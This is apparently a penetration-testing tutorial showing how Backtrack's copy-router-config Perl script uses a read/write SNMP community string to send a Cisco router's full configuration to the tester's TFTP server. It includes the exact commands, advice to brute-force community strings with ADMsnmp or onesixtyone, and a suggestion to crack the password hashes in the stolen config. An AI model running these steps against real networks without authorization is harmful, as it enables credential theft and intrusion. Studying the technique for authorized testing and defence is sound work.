The copy-router-config menu item, which is located in the Backtrack menu (Backtrack > Vulnerability Assessment > Network Assessment > Cisco Tools), is a handy little Perl script put together by Muts himself. Once you click on the menu item it will launch a terminal window in the /pentest/cisco/copy-router-config directory so you will have direct access to the 35 line Perl script which servers a single purpose. That purpose is to copy an entire router configuration file from a Cisco device if you have a RW (read/write) community string for the router.
Launch TFTP Server To Accept Cisco Router Configuration:
If you do not have a TFTP server available on your local network you will to launch one in Backtrack. This can be done by issuing a single command from the Backtrack CLI as shown in the example below.
Launch TFTP Server Backtrack Linux:
- root@bt:/pentest/cisco/copy-router-config# in.tftpd --daemon
The default TFTP directory in Backtrack 5 R3 is /srv/tftp and should work fine for the task of copying the Cisco routers configuration. The script does note that the /tmp directory is preferred but again I have not run into any issues using the default /srv/tftp directory. Once you have issued the above command you can make sure the TFTP server is running properly by using netstat as shown in the example output below.
Verify TFTP Server Running In Backtrack Linux:
- root@bt:/pentest/cisco/copy-router-config# netstat -atnpu | grep 69
- udp 0 0 0.0.0.0:69 0.0.0.0:* 4724/in.tftpd
Once you know the TFTP server is running and you have a RW community string, which you can attempt to bruteforce using ADMsnmp or onesixtyone, for the Cisco router you can grab the entire configuration using the copy-router-config script as shown in the below example. It should be noted again that you will not be able to obtain the Cisco router configuration with a RO or read only SNMP community string so verify the community string is RW or read/write otherwise you will receive errors.
Copy Entire Cisco Router Configuration File With copy-router-config:
- root@bt:/pentest/cisco/copy-router-config# perl copy-router-config.pl 192.168.1.22 192.168.1.88 private
- 192.168.1.88:pwnd-router.config -> 192.168.1.22:running-config... OK
Bingo… thats it. Depending on this devices location in the network you now should be able to understand a lot more about this targets network by analyzing the Cisco router configuration. You likely will also have hashes for the user accounts configured on the device and once cracked it should open more doors to explore. The Cisco router configuration file will be located in /srv/tftp and named pwnd-router.config. Be careful if you are grabbing numerous router configurations because the next one you grab will overwrite the first if you have not renamed it before grabbing the second Cisco routers configuration file. Thanks for the script Muts!